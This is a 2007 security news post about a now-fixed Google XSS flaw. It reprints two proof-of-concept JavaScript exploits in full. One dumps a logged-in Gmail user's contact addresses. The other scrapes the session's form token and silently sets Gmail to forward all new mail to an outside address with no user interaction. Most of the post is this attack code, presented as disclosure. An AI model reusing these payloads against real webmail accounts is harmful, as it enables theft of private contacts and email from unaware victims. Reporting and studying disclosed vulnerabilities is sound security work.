Advertisements

 A new critical Google XSS vulnerability promptly corrected

Written by DP

Thursday, 27 September 2007

Check out the new Google XSS vulnerability that beford discovered. Actually are exploits which allow attackers to steal information from Gmail accounts. These exploits have been successfully tested under all major browsers. Those of  you who use Firefox + NoScript plugin are fully protected against such kind of attacks.



The following PoC JavaScript exploit by bedford, was called in the vulnerable parameter to show your contacts:


document.innerHTML = '';

function readXML(fichero, funcion) {
   var xmlDoc;
   var gecko = (typeof document.implementation != 'undefined')  && (typeof document.implementation.createDocument != 'undefined');
   var ie = (typeof window.ActiveXObject != 'undefined');

  if (gecko) {
    xmlDoc = document.implementation.createDocument("", "", null)
    xmlDoc.load(fichero);
    xmlDoc.onload = function() {  funcion(xmlDoc); }
  } else if (ie) {
    xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
    xmlDoc.async = false;
    xmlDoc.load(fichero);
    if (xmlDoc.readyState == 4) funcion(xmlDoc);
  }
}

function writeList(xmlDoc)
{
    var cells = xmlDoc.getElementsByTagName("Address");
    for (var i = 0; i < cells.length; i++) {
    status = cells[i].childNodes[0].nodeValue;
    document.write(i + '. ' +status + '<br/>');
    }
 
 
}

readXML('http://groups.google.com/groups/profile/contacts?max=900', writeList);




The following PoC JavaScript exploit by beford, was called in the vulnerable parameter to forward all new received e-mails to another email account - not needing user interaction, just the victim to be logged in to Gmail.



function findOne(str, startsign, endsign, pos) {
    var start = str.indexOf(startsign, pos);
    if (start < 0) {
        return '';
    }
    start += startsign.length;
    var end = str.indexOf(endsign, start);
    if (end < 0) {
        return '';
    }
    return str.substring(start, end);
}


new Ajax.Request('/mail/h/?v=prfap', {
    method: 'get',
    onSuccess: function(transport) {
        var page = transport.responseText;
        athash = findOne(page, '<form action="?at=', "\"\nname=f enctype=multipart/form-data method=POST",1);
        kk=findOne(page,'<a href="http://mail.google.com/mail/h/', '/?logout', 1);
        fwdp=1;
        p_sx_em='fernando@beford.org';
        p_sx_at="";
        p_ix_pd="0";
        nvp_a_prefs="Save Changes";
        
        new Ajax.Request('/mail/h/'+kk+'/?at=' + athash, {
            method: 'post',

            parameters: 'fwdp=1' + '&p_sx_em=' + encodeURIComponent(p_sx_em) + '&p_sx_at=' + encodeURIComponent(p_sx_at) + '&p_ix_pd=0&nvp_a_prefs=' + encodeURIComponent(nvp_a_prefs),
            onSuccess: function(transport) {
                var page = transport.responseText;
                var ok = 0;
            },
            onComplete: function(transport) {
                
            }
        });            
    }
});



Google appears to have promptly corrected the vulnerability.


        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.